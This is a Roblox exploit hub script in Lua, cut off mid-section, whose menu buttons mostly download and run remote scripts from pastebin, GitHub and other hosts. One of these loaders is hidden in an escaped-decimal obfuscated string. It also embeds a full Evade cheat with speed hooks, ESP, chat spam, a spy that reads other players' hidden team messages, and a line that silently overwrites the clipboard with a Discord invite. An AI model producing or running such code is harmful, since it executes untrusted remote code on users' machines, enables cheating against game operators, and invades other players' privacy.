local Library = loadstring(game:HttpGet("https://pastebin.com/raw/vff1bQ9F"))()
local Window = Library.CreateLib("SofiaandKelsey", "Ocean")
local Tab = Window:NewTab("Main")
local Section = Tab:NewSection("Scripts")
Section:NewButton("All games", "NukeVsCity", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/NukeVsCity/TheALLHACKLoader/main/NukeLoader"))()
print("Clicked")
end)
Section:NewButton("Piano", "Let's you autoplay", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/JxcExploit/Sad/main/NoKey"))()
print("Clicked")
end)
Section:NewButton("Fly", "Lets you fly", function()
loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
print("Clicked")
end)
Section:NewButton("bloxfruit", "Loads a blox fruit script", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ThunderZ-05/HUB/main/Mobile-Loader"))()
print("Clicked")
end)
Section:NewButton("infinite yield", "Loads infinite yield", function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
print("Clicked")
end)
Section:NewButton("Bedwars", "Loads bedwars script", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/JNHHGaming/JN-HH-Gaming-Pro/main/JN%20HH%20Gaming%20Pro",true))()
print("Clicked")
end)
Section:NewButton("Piggy", "Loads piggy script", function()
local PiggyGui = Instance.new("ScreenGui")
PiggyGui.Name = "PiggyGui"
PiggyGui.Parent = game.StarterGui
 
local ScrollingFrame = Instance.new("ScrollingFrame", PiggyGui)
ScrollingFrame.BackgroundColor3 = Color3.new(0.15, 0.15, 0.15)
ScrollingFrame.Position = UDim2.new(0.08, 0, 0.42, 0)
ScrollingFrame.Size = UDim2.new(0, 296, 0, 388)
 
 
 
 
local PiggyGui = Instance.new("ScreenGui")
PiggyGui.Name = "PiggyGui"
PiggyGui.Parent = game.CoreGui
 
local ScrollingFrame = Instance.new("ScrollingFrame", PiggyGui)
ScrollingFrame.BackgroundColor3 = Color3.new(0.15, 0.15, 0.15)
ScrollingFrame.Position = UDim2.new(0.08, 0, 0.42, 0)
ScrollingFrame.Size = UDim2.new(0, 296, 0, 388)
 
local UIGridLayout = Instance.new("UIGridLayout", ScrollingFrame)
UIGridLayout.CellSize = UDim2.new(0,90,0,90)
 
while wait(1) do
local a = workspace:getDescendants()
local items = {}
local itemframes = ScrollingFrame:getChildren()
for i=1,#itemframes do
if itemframes[i].ClassName == "TextButton" then
itemframes[i]:remove()
end
end
for i=1,#a do
if a[i].Name == "ItemPickupScript" and a[i].Parent:findFirstChild("ClickDetector") then
table.insert(items, a[i].Parent)
end
end
for i=1,#items do
local ItemFrame = Instance.new("TextButton", ScrollingFrame)
ItemFrame.Name = "ItemFrame"
ItemFrame.BackgroundColor3 = Color3.new(1, 1, 1)
ItemFrame.BackgroundTransparency = 0.95
ItemFrame.Size = UDim2.new(0, 100, 0, 100)
ItemFrame.Text = ""
local View = Instance.new("ViewportFrame", ItemFrame)
View.Name = "View"
View.Size = UDim2.new(1,0,1,0)
View.BackgroundTransparency = 1
View.BorderSizePixel = 0
local object = items[i]
local viewportclone = object:Clone()
viewportclone.Parent = View
local cam = Instance.new("Camera", viewportclone)
cam.CameraType = Enum.CameraType.Fixed
local objectPosition = object.Position
local cameraPosition = objectPosition + Vector3.new(0,3,0)
cam.CoordinateFrame = CFrame.new(cameraPosition, objectPosition)
View.CurrentCamera = cam
 
ItemFrame.MouseButton1Down:connect(function()
if items[i]:findFirstChild("ClickDetector") then
local cpos = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
wait(0.05)
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = items[i].CFrame
wait(0.1)
fireclickdetector(items[i].ClickDetector)
wait(0.3)
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = cpos
end
end)
end
end
print("Clicked")
end)
Section:NewButton("Yba", "Loads Yba script", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/zakater5/LuaRepo/main/YBA/v3.lua"))()
print("Clicked")
end)
Section:NewButton("Teentitans", "Loads teen titans script", function()
_G.Key = "enter key"
--- https://discord.gg/8gNrnWmgcb
pcall(function()
  loadstring(game:HttpGet("https://roflux.net/scripts/games/" .. tostring(game.PlaceId) .. ".lua"))()
end)
print("Clicked")
end)
Section:NewButton("Shindo life", "Loads shindo life script need key", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/IkkyyDF/ProjectNexus/main/Loader.lua"))()
print("Clicked")
end)
Section:NewButton("My restaurant", "Loads my restaurant script idek much about this script the key is BestMyRestaurant1215Roblox!!", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/LOLking123456/My1/main/Restaurant15"))()
print("Clicked")
end)
Section:NewButton("Icecat", "From bedwars", function()
loadstring(game:HttpGet(('https://github.com/Baconontop/bedwarsV2/raw/main/IcecatBedwars'),true))()
print("Clicked")
end)
Section:NewButton("zaque hub", "from bloxfruits", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Mei2232/ZaqueHub/main/Zaque%20Hub"))()  print("Clicked")
end)
Section:NewButton("Keyboard", "Just keyboard nothing else", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))()
print("Clicked")
end)
Section:NewButton("Evade", "Evadescript", function()
local WorkspacePlayers = game:GetService("Workspace").Game.Players
		local Players = game:GetService('Players')
		local localplayer = Players.LocalPlayer
		local GuiService = game:GetService("GuiService")
		local Light = game:GetService("Lighting")
		local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
		OrionLib:MakeNotification({
			Name = "Hydra Network",
			Content = "Hydra Network is Loading.",
			Image = "rbxassetid://4483345998",
			Time = 4
		})
		game:GetService("ReplicatedStorage").Events.Respawn:FireServer()
		wait(4)
		OrionLib:MakeNotification({
			Name = "Hydra Network",
			Content = "Hydra Network is Ready!",
			Image = "rbxassetid://4483345998",
			Time = 2
		})
		local Window = OrionLib:MakeWindow({Name = "Hydra Network |Evade|", HidePremium = false,IntroText = "Evade V2.6", SaveConfig = false, ConfigFolder = "OrionTest"})

		--functions and shit
		getgenv().money = true
		getgenv().revivedie = true
		getgenv().autowistle = true
		getgenv().autochat = true
		getgenv().AutoDrink = true
		getgenv().NoCameraShake = true
		getgenv().Settings = {
			moneyfarm = false,
			afkfarm = false,
			NoCameraShake = false,
			Speed = 1450,
			Jump = 3,
			reviveTime = 3,
		}

		local FindAI = function()
			for _,v in pairs(WorkspacePlayers:GetChildren()) do
				if not Players:FindFirstChild(v.Name) then
					return v
				end
			end
		end

		local GetDownedPlr = function()
			for i,v in pairs(WorkspacePlayers:GetChildren()) do
				if v:GetAttribute("Downed") then
					return v
				end
			end
		end

		local revive = function()
			local downedplr = GetDownedPlr()
			if downedplr ~= nil and downedplr:FindFirstChild('HumanoidRootPart') then
				task.spawn(function()
					while task.wait() do
						if localplayer.Character then
							workspace.Game.Settings:SetAttribute("ReviveTime", 2.2)
							localplayer.Character:FindFirstChild('HumanoidRootPart').CFrame = CFrame.new(downedplr:FindFirstChild('HumanoidRootPart').Position.X, downedplr:FindFirstChild('HumanoidRootPart').Position.Y + 3, downedplr:FindFirstChild('HumanoidRootPart').Position.Z)
							task.wait()
							game:GetService("ReplicatedStorage").Events.Revive.RevivePlayer:FireServer(tostring(downedplr), false)
							task.wait(4.5)
							game:GetService("ReplicatedStorage").Events.Revive.RevivePlayer:FireServer(tostring(downedplr), true)
							game:GetService("ReplicatedStorage").Events.Revive.RevivePlayer:FireServer(tostring(downedplr), true)
							game:GetService("ReplicatedStorage").Events.Revive.RevivePlayer:FireServer(tostring(downedplr), true)
							break
						end
					end
				end)
			end
		end

		task.spawn(function()
			while task.wait() do
				if Settings.AutoRespawn then
					if localplayer.Character and localplayer.Character:GetAttribute("Downed") then
						game:GetService("ReplicatedStorage").Events.Respawn:FireServer()
					end
				end

				if Settings.NoCameraShake then
					localplayer.PlayerScripts.CameraShake.Value = CFrame.new(0,0,0) * CFrame.new(0,0,0)
				end
				if Settings.moneyfarm then
					if localplayer.Character and localplayer.Character:GetAttribute("Downed") then
						game:GetService("ReplicatedStorage").Events.Respawn:FireServer()
						task.wait(3)
					else
						revive()
						task.wait(1)
					end
				end
				if Settings.moneyfarm == false and Settings.afkfarm and localplayer.Character:FindFirstChild('HumanoidRootPart') ~= nil then
					localplayer.Character:FindFirstChild('HumanoidRootPart').CFrame = CFrame.new(6007, 7005, 8005)
				end
			end
		end)

		function camerashake()
			while NoCameraShake == true do task.wait()
				localplayer.PlayerScripts.CameraShake.Value = CFrame.new(0,0,0) * CFrame.new(0,0,0)
			end
		end

		function autodrink()
			while AutoDrink == true do
				local ohString1 = "Cola"
				game:GetService("ReplicatedStorage").Events.UseUsable:FireServer(ohString1)
				wait(6)
			end
		end

		function SpamChat()
			while autochat == true do
				local ohString1 = "Hydra Network on top"
				local ohString2 = "All"
				game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(ohString1, ohString2)
				wait(1)
			end
		end

		function autowistlefunction()
			while autowistle == true do
				local ohString1 = "Whistle"
				local ohBoolean2 = true
				game:GetService("Players").LocalPlayer.PlayerScripts.Events.KeybindUsed:Fire(ohString1, ohBoolean2)
				game:GetService("ReplicatedStorage").Events.Whistle:FireServer()
				wait(5)
			end
		end

		function god()
			while revivedie == true do
				game:GetService("ReplicatedStorage").Events.Respawn:FireServer()
				wait()
			end
		end

		function dofullbright()
			Light.Ambient = Color3.new(1, 1, 1)
			Light.ColorShift_Bottom = Color3.new(1, 1, 1)
			Light.ColorShift_Top = Color3.new(1, 1, 1)
			game.Lighting.FogEnd = 100000
			game.Lighting.FogStart = 0
			game.Lighting.ClockTime = 14
			game.Lighting.Brightness = 2
			game.Lighting.GlobalShadows = false
		end

		function freemoney()
			while money == true do
				local ohString1 = "Free money <font color=\"rgb(100,255,100)\">($99999)</font>"
				game:GetService("Players").LocalPlayer.PlayerGui.HUD.Messages.Use:Fire(ohString1)
				wait(5)
			end
		end

		OrionLib:MakeNotification({
			Name = "Welcome To Hydra Network",
			Content = "Thanks for using Hydra Network!",
			Image = "rbxassetid://4483345998",
			Time = 5
		})


		function RandomEmote()
			OrionLib:MakeNotification({
				Name = "Random Emoting...",
				Content = "You pressed the Random Emote keybind",
				Image = "rbxassetid://4483345998",
				Time = 5
			})
		end
		--tabs

		local MainTab= Window:MakeTab({
			Name = "Main features",
			Icon = "rbxassetid://4483345998",
			PremiumOnly = false
		})

		local MiscTab= Window:MakeTab({
			Name = "Extra",
			Icon = "rbxassetid://4483345998",
			PremiumOnly = false
		})

		local ESPTab = Window:MakeTab({
			Name =  "Esp",
			Icon = "rbxassetid://4483345998",
			PremiumOnly = false
		})

		local TeleportTab= Window:MakeTab({
			Name = "Teleport",
			Icon = "rbxassetid://4483345998",
			PremiumOnly = false
		})

		local FunTab= Window:MakeTab({
			Name = "Fun",
			Icon = "rbxassetid://4483345998",
			PremiumOnly = false
		})

		local CreditsTab = Window:MakeTab({
			Name = "Credits",
			Icon = "rbxassetid://4483345998",
			PremiumOnly = true
		})

		local MiscTab3 = MainTab:AddSection({
			Name = "Auto Farms"
		})

		MainTab:AddToggle({
			Name = "Money Farm",
			Default = false,
			Callback = function(Value)
				Settings.moneyfarm = Value
			end    
		})

		MainTab:AddToggle({
			Name = "Afk Farm",
			Default = false,
			Callback = function(Value)
				Settings.afkfarm = Value
			end    
		})

		--sliders
		local MainTab3 = MainTab:AddSection({
			Name = "Sliders"
		})

		local Misctab5 = MiscTab:AddSection({
			Name = "Sliders"
		})

		local TargetWalkspeed
		MainTab:AddSlider({
			Name = "Speed",
			Min = 0,
			Max = 250,
			Default = 0,
			Color = Color3.fromRGB(128, 128, 128),
			Increment = 1,
			ValueName = "Walk Speed",
			Callback = function(Value)
				TargetWalkspeed = Value
			end   
		})

		MainTab:AddSlider({
			Name = "Hip height",
			Min = -1.40,
			Max = 100,
			Default = -1.40,
			Color = Color3.fromRGB(128, 128, 128),
			Increment = 1,
			ValueName = "Hip Height",
			Callback = function(HipValue)
				game.Players.LocalPlayer.Character.Humanoid.HipHeight = HipValue
			end    
		})

		MainTab:AddSlider({
			Name = "Fov Slider",
			Min = 1,
			Max = 120,
			Default = 70,
			Color = Color3.fromRGB(128, 128, 128),
			Increment = 1,
			ValueName = "Fov",
			Callback = function(Fov)
				local ohString1 = "FieldOfView"
				local ohNumber2 = Fov
				game:GetService("ReplicatedStorage").Events.UpdateSetting:FireServer(ohString1, ohNumber2)
			end
		})

		MainTab:AddSlider({
			Name = "Jump Power",
			Min = 0,
			Max = 120,
			Default = 3,
			Color = Color3.fromRGB(128, 128, 128),
			Increment = 1,
			ValueName = "Jump",
			Callback = function(Value)
				Settings.Jump = Value
			end
		})

		MiscTab:AddSlider({
			Name = "Day & night Slider",
			Min = 0,
			Max = 24,
			Default = 14,
			Color = Color3.fromRGB(128, 128, 128),
			Increment = 0.1,
			ValueName = "Time",
			Callback = function(Time)
				game.Lighting.ClockTime = Time
			end
		})

		--toggles

		local FunTab2 = FunTab:AddSection({
			Name = "Toggles"
		})

		local MiscTab3 = MainTab:AddSection({
			Name = "Toggles"
		})

		MainTab:AddToggle({
			Name = "No Camera Shake",
			Default = false,
			Callback = function(Value)
				NoCameraShake = Value
				camerashake()
			end    
		})

		MainTab:AddToggle({
			Name = "Auto Drink Cola (drinks everytime it runs out)",
			Default = false,
			Callback = function(Value)
				AutoDrink = Value
				autodrink()
			end    
		})

		FunTab:AddToggle({
			Name = "Spam Chat",
			Default = false,
			Callback = function(Value)
				autochat = Value
				SpamChat()
			end    
		})

		FunTab:AddToggle({
			Name = "fake money giver",
			Default = false,
			Callback = function(Value)
				money = Value
				freemoney()
			end    
		})

		MainTab:AddToggle({
			Name = "auto respawn (you respawn when you get downed)",
			Default = false,
			Callback = function(Value)
				Settings.AutoRespawn = Value
			end    
		})

		FunTab:AddToggle({
			Name = "Auto Wistle",
			Default = false,
			Callback = function(Value)
				autowistle = Value
				autowistlefunction()
			end    
		})

		--buttons
		local FunTab3 = FunTab:AddSection({
			Name = "Buttons"
		})

		local MiscTab2 = MiscTab:AddSection({
			Name = "Buttons"
		})

		MiscTab:AddButton({
			Name = "Chat Spy",
			Callback = function()
				enabled = true
				spyOnMyself = false
				public = false
				publicItalics = true
				privateProperties = {
					Color = Color3.fromRGB(0,255,255); 
					Font = Enum.Font.SourceSansBold;
					TextSize = 18;
				}
				local StarterGui = game:GetService("StarterGui")
				local Players = game:GetService("Players")
				local player = Players.LocalPlayer
				local saymsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("SayMessageRequest")
				local getmsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("OnMessageDoneFiltering")
				local instance = (_G.chatSpyInstance or 0) + 1
				_G.chatSpyInstance = instance

				local function onChatted(p,msg)
					if _G.chatSpyInstance == instance then
						if p==player and msg:lower():sub(1,4)=="/spy" then
							enabled = not enabled
							wait(0.3)
							privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}"
							StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
						elseif enabled and (spyOnMyself==true or p~=player) then
							msg = msg:gsub("[\n\r]",''):gsub("\t",' '):gsub("[ ]+",' ')
							local hidden = true
							local conn = getmsg.OnClientEvent:Connect(function(packet,channel)
								if packet.SpeakerUserId==p.UserId and packet.Message==msg:sub(#msg-#packet.Message+1) and (channel=="All" or (channel=="Team" and public==false and Players[packet.FromSpeaker].Team==player.Team)) then
									hidden = false
								end
							end)
							wait(1)
							conn:Disconnect()
							if hidden and enabled then
								if public then
									saymsg:FireServer((publicItalics and "/me " or '').."{SPY} [".. p.Name .."]: "..msg,"All")
								else
									privateProperties.Text = "{SPY} [".. p.Name .."]: "..msg
									StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
								end
							end
						end
					end
				end

				for _,p in ipairs(Players:GetPlayers()) do
					p.Chatted:Connect(function(msg) onChatted(p,msg) end)
				end
				Players.PlayerAdded:Connect(function(p)
					p.Chatted:Connect(function(msg) onChatted(p,msg) end)
				end)
				privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}"
				StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
				local chatFrame = player.PlayerGui.Chat.Frame
				chatFrame.ChatChannelParentFrame.Visible = true
				chatFrame.ChatBarParentFrame.Position = chatFrame.ChatChannelParentFrame.Position+UDim2.new(UDim.new(),chatFrame.ChatChannelParentFrame.Size.Y)
				OrionLib:MakeNotification({
					Name = "Hydra Network",
					Content = "Pressed on the Chat Spy Button",
					Image = "rbxassetid://4483345998",
					Time = 2
				})    
			end    
		})

		ESPTab:AddButton({
			Name = "Player Esp",
			Callback = function()
				local c = workspace.CurrentCamera
				local ps = game:GetService("Players")
				local lp = ps.LocalPlayer
				local rs = game:GetService("RunService")
				local function getdistancefc(part)
					return (part.Position - c.CFrame.Position).Magnitude
				end
				local function esp(p, cr)
					local h = cr:WaitForChild("Humanoid")
					local hrp = cr:WaitForChild("HumanoidRootPart")
					local text = Drawing.new("Text")
					text.Visible = false
					text.Center = true
					text.Outline = true
					text.Font = 2
					text.Color = Color3.fromRGB(255, 255, 255)
					text.Size = 17
					local c1
					local c2
					local c3
					local function dc()
						text.Visible = false
						text:Remove()
						if c1 then
							c1:Disconnect()
							c1 = nil
						end
						if c2 then
							c2:Disconnect()
							c2 = nil
						end
						if c3 then
							c3:Disconnect()
							c3 = nil
						end
					end
					c2 =
						cr.AncestryChanged:Connect(
							function(_, parent)
								if not parent then
								dc()
							end
							end
						)
					c3 =
						h.HealthChanged:Connect(
							function(v)
								if (v <= 0) or (h:GetState() == Enum.HumanoidStateType.Dead) then
								dc()
							end
							end
						)
					c1 =
						rs.RenderStepped:Connect(
							function()
								local hrp_pos, hrp_os = c:WorldToViewportPoint(hrp.Position)
								if hrp_os then
								text.Position = Vector2.new(hrp_pos.X, hrp_pos.Y)
								text.Text = p.Name .. " (" .. tostring(math.floor(getdistancefc(hrp))) .. " m)"
								text.Visible = true
							else
								text.Visible = false
							end
							end
						)
				end
				local function p_added(p)
					if p.Character then
						esp(p, p.Character)
					end
					p.CharacterAdded:Connect(
						function(cr)
							esp(p, cr)
						end
					)
				end
				for i, p in next, ps:GetPlayers() do
					if p ~= lp then
						p_added(p)
					end
				end
				ps.PlayerAdded:Connect(p_added)
				OrionLib:MakeNotification({
					Name = "Hydra Network",
					Content = "Pressed on the Player Esp Button",
					Image = "rbxassetid://4483345998",
					Time = 2
				}) 
			end    
		})

		MiscTab:AddButton({
			Name = "Inf Jump",
			Callback = function()
				local InfiniteJumpEnabled = true
				game:GetService("UserInputService").JumpRequest:connect(function()
					if InfiniteJumpEnabled then
						game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping")
					end
				end)
				OrionLib:MakeNotification({
					Name = "Hydra Network",
					Content = "Pressed on the Inf Jump Button",
					Image = "rbxassetid://4483345998",
					Time = 2
				}) 
			end    
		})

		MiscTab:AddButton({
			Name = "Q to Teleport",
			Callback = function()
				plr = game.Players.LocalPlayer 
				hum = plr.Character.HumanoidRootPart 
				mouse = plr:GetMouse()
				mouse.KeyDown:connect(function(key)
					if key == "q" then
						if mouse.Target then
							hum.CFrame = CFrame.new(mouse.Hit.x, mouse.Hit.y + 5, mouse.Hit.z)
						end
					end
				end)
				OrionLib:MakeNotification({
					Name = "Hydra Network",
					Content = "Pressed on the Q To Teleport Button",
					Image = "rbxassetid://4483345998",
					Time = 2
				}) 
			end    
		})

		MiscTab:AddButton({
			Name = "Full Bright",
			Callback = function()
				dofullbright()
				OrionLib:MakeNotification({
					Name = "Hydra Network",
					Content = "Pressed on the Full Bright Button",
					Image = "rbxassetid://4483345998",
					Time = 2
				}) 
			end    
		})

		MiscTab:AddButton({
			Name = "Return Too Main Menu",
			Callback = function()
				game:GetService("ReplicatedStorage").Events.ReturnToMenu:FireServer()
			end    
		})

		MiscTab:AddButton({
			Name = "Low Quality",
			Callback = function()
				local ohString1 = "LowQuality"
				local ohBoolean2 = true
				game:GetService("ReplicatedStorage").Events.UpdateSetting:FireServer(ohString1, ohBoolean2)
				OrionLib:MakeNotification({
					Name = "Hydra Network",
					Content = "Pressed on the Low Quality Button",
					Image = "rbxassetid://4483345998",
					Time = 2
				}) 
			end    
		})

		FunTab:AddButton({
			Name = "Free cam (shift + P)",
			Callback = function()
				loadstring(game:HttpGet("https://raw.githubusercontent.com/Robobo2022/script/main/Freecam.lua"))()
				OrionLib:MakeNotification({
					Name = "Hydra Network",
					Content = "Pressed on the Free cam Button",
					Image = "rbxassetid://4483345998",
					Time = 2
				}) 
			end    
		})

		TeleportTab:AddButton({
			Name = "Main Game",
			Callback = function()
				local TeleportService = game:GetService('TeleportService')
				GameId = 9872472334
				TeleportService:Teleport(GameId, game.Players.LocalPlayer)
			end    
		})


		TeleportTab:AddButton({
			Name = "Casual",
			Callback = function()
				local TeleportService = game:GetService('TeleportService')
				GameId = 10662542523
				TeleportService:Teleport(GameId, game.Players.LocalPlayer)
			end    
		})

		TeleportTab:AddButton({
			Name = "Social Space",
			Callback = function()
				local TeleportService = game:GetService('TeleportService')
				GameId = 10324347967
				TeleportService:Teleport(GameId, game.Players.LocalPlayer)
			end    
		})

		TeleportTab:AddButton({
			Name = "Big Team",
			Callback = function()
				local TeleportService = game:GetService('TeleportService')
				GameId = 10324346056
				TeleportService:Teleport(GameId, game.Players.LocalPlayer)
			end    
		})

		TeleportTab:AddButton({
			Name = "Team DeathMatch",
			Callback = function()
				local TeleportService = game:GetService('TeleportService')
				GameId = 110539706691
				TeleportService:Teleport(GameId, game.Players.LocalPlayer)
			end    
		})

		TeleportTab:AddButton({
			Name = "Vc Only",
			Callback = function()
				local TeleportService = game:GetService('TeleportService')
				GameId = 10808838353
				TeleportService:Teleport(GameId, game.Players.LocalPlayer)
			end    
		})

		local MiscTab2 = MiscTab:AddSection({
			Name = "Item Giver"
		})

		MiscTab:AddButton({
			Name = "Test Emote (Permanant)",
			Callback = function()
				game:GetService("ReplicatedStorage").Events.UI.Purchase:InvokeServer("Emotes", "Test")
			end    
		})

		--KeybindsButton

		local MiscTab1 = MiscTab:AddSection({
			Name = "KeyBinds"
		})

		local FunTab1 = FunTab:AddSection({
			Name = "KeyBinds"
		})

		MiscTab:AddBind({
			Name = "Drink Cola",
			Default = Enum.KeyCode.H,
			Hold = false,
			Callback = function()
				local ohString1 = "Cola"
				game:GetService("ReplicatedStorage").Events.UseUsable:FireServer(ohString1)
			end    
		})

		MiscTab:AddBind({
			Name = "Rejoin Server",
			Default = Enum.KeyCode.B,
			Hold = false,
			Callback = function()
				OrionLib:MakeNotification({
					Name = "You Pressed the Rejoin Keybind.",
					Content = "Rejoining in 5 seconds",
					Image = "rbxassetid://4483345998",
					Time = 5
				})
				wait(1)
				OrionLib:MakeNotification({
					Name = "Hydra Network",
					Content = "Rejoining in 4 seconds",
					Image = "rbxassetid://4483345998",
					Time = 5
				})
				wait(1)
				OrionLib:MakeNotification({
					Name = "Hydra Network",
					Content = "Rejoining in 3 seconds",
					Image = "rbxassetid://4483345998",
					Time = 5
				})
				wait(1)
				OrionLib:MakeNotification({
					Name = "Hydra Network",
					Content = "Rejoining in 2 seconds",
					Image = "rbxassetid://4483345998",
					Time = 5
				})
				wait(1)
				OrionLib:MakeNotification({
					Name = "Hydra Network",
					Content = "Rejoining in 1 seconds",
					Image = "rbxassetid://4483345998",
					Time = 5
				})
				wait(1)
				OrionLib:MakeNotification({
					Name = "Hydra Network",
					Content = "Rejoining",
					Image = "rbxassetid://4483345998",
					Time = 5
				})
				local ts = game:GetService("TeleportService")
				local p = game:GetService("Players").LocalPlayer
				ts:Teleport(game.PlaceId, p)
			end    
		})

		MiscTab:AddBind({
			Name = "Random Vote",
			Default = Enum.KeyCode.X,
			Hold = false,
			Callback = function()
				local RandomVote = math.random(3)
				local ohNumber1 = (RandomVote)
				game:GetService("ReplicatedStorage").Events.Vote:FireServer(ohNumber1)
				OrionLib:MakeNotification({
					Name = "Hydra Network",
					Content = "Pressed on the Random Vote Keybind",
					Image = "rbxassetid://4483345998",
					Time = 2
				}) 
			end    
		})

		MiscTab:AddBind({
			Name = "Respawn",
			Default = Enum.KeyCode.R,
			Hold = false,
			Callback = function()
				game:GetService("ReplicatedStorage").Events.Respawn:FireServer()
				OrionLib:MakeNotification({
					Name = "Respawning...",
					Content = "You pressed the respawn keybind",
					Image = "rbxassetid://4483345998",
					Time = 5
				})
			end    
		})

		FunTab:AddBind({
			Name = "Random Emote",
			Default = Enum.KeyCode.Z,
			Hold = false,
			Callback = function()
				local number = math.random(4)
				local ohString1 = (number)
				game:GetService("ReplicatedStorage").Events.Emote:FireServer(ohString1)
				RandomEmote()
			end    
		})
		--test

		ESPTab:AddToggle({
			Name = "Bots tracers",
			Default = true,
			Callback = function(Value)
				getgenv().toggleespmpt = Value
			end    
		})

		ESPTab:AddColorpicker({
			Name = "Colour",
			Default = Color3.fromRGB(255, 255, 255),
			Callback = function(Value)
				getgenv().mptespcolour = Value
			end  
		})

		--credits

		CreditsTab:AddParagraph("Owner/Main Dev","hydra#8270")
		CreditsTab:AddParagraph("Credits","Felix and ss.spooky.ss")
		CreditsTab:AddParagraph("Credits","xCLY And batusd")
		CreditsTab:AddParagraph("Credits","Truncated Cuboctahedron")


		local cam = workspace.CurrentCamera
		local rs = game:GetService'RunService'

		getgenv().toggleespmpt = true
		function esp(plr)
			if game:GetService'Players':GetPlayerFromCharacter(plr) == nil then
				local rat = Drawing.new("Line")
				rs.RenderStepped:Connect(function()
					if plr:FindFirstChild'HumanoidRootPart' then
						local vector,screen = cam:WorldToViewportPoint(plr.HumanoidRootPart.Position)
						if screen then
							rat.Visible = toggleespmpt
							rat.From = Vector2.new(cam.ViewportSize.X / 2,cam.ViewportSize.Y / 1)
							rat.To = Vector2.new(vector.X,vector.Y)
							rat.Color = getgenv().mptespcolour
							rat.Thickness = getgenv().mptespthickness
						else
							rat.Visible = false
						end
					else
						pcall(function()
							rat.Visible = false
						end)
					end
					if not plr:FindFirstChild'HumanoidRootPart' or not plr:FindFirstChild'HumanoidRootPart':IsDescendantOf(game:GetService'Workspace') then
						pcall(function()
							rat:Remove()
						end)
					end
				end)
			end
		end

		for i,v in pairs(game:GetService'Workspace'.Game.Players:GetChildren()) do
			esp(v)
		end

		game:GetService'Workspace'.Game.Players.ChildAdded:Connect(function(plr)
			esp(plr)
		end)

		local old
		old = hookmetamethod(game,"__namecall",newcclosure(function(self,...)
			local Args = {...}
			local method = getnamecallmethod()
			if tostring(self) == 'Communicator' and method == "InvokeServer" and Args[1] == "update" then
				return Settings.Speed, Settings.Jump 
			end
			return old(self,...)
		end))

		setclipboard("https://discord.gg/k9a4zym5uG")

		OrionLib:MakeNotification({
			Name = "Join Discord",
			Content = "Join the Discord Copied in your clip Board",
			Image = "rbxassetid://4483345998",
			Time = 5
		})

		game:GetService("RunService").RenderStepped:Connect(function()
			pcall(function()
				if game.Players.LocalPlayer.Character.Humanoid.MoveDirection.Magnitude > 0 then
					game.Players.LocalPlayer.Character:TranslateBy(game.Players.LocalPlayer.Character.Humanoid.MoveDirection * TargetWalkspeed/100)
				end
			end)
		end)

		OrionLib:Init()
print("Clicked")
end)
Section:NewButton("Speed hub x", "From blox fruit and maybe shindo life", function()
loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/ahmadsgamer2/Script--Game/main/Script%20Game"))()
print("Clicked")
end)
Section:NewButton("Get fruit", "from bloxfruits kinda helps", function()
Fruits = {
"Bird: Falcon Fruit",
"Diamond Fruit",
"Light Fruit",
"Rubber Fruit",
"Barrier Fruit",
"Magma Fruit",
"Quake Fruit",
"Blizzard Fruit",
"Portal Fruit",
"String Fruit",
"Dark Fruit",
"Sand Fruit",
"Ice Fruit",
"Spin Fruit",
"Flame Fruit",
"Bomb Fruit",
"Smoke Fruit",
"Spin Fruit",
"Spring Fruit",
"Kilo Fruit",
"Revive Fruit",
"Chop Fruit",
"Human: Buddha Fruit",
"Bird: Phoenix Fruit",
"Rumble Fruit",
"Paw Fruit",
"Gravity Fruit",
"Dough Fruit",
"Control Fruit",
"Venom Fruit",
"Shadow Fruit",
"Dragon Fruit" ,
"Soul Fruit",
"Leopard Fruit"
}
Valuable = {"Kilo Fruit","Spin Fruit","Spring Fruit","Bomb Fruit","Smoke Fruit","Spike Fruit","Flame Fruit","Bird: Falcon Fruit","Ice Fruit","Sand Fruit","Dark Fruit","Diamond Fruit","Light Fruit","Rubber Fruit","Barrier Fruit","Magna Fruit","Quake Fruit","String Fruit","Portal Fruit","Blizzard Fruit","Revive Fruit","Chop Fruit, Dough Fruit","Shadow Fruit","Venom Fruit","Control Fruit","Dragon Fruit","Soul Fruit","Leopard Fruit"} ------ it will stop the script if you got this fruit
Webhook = "" --------------------------------Optional
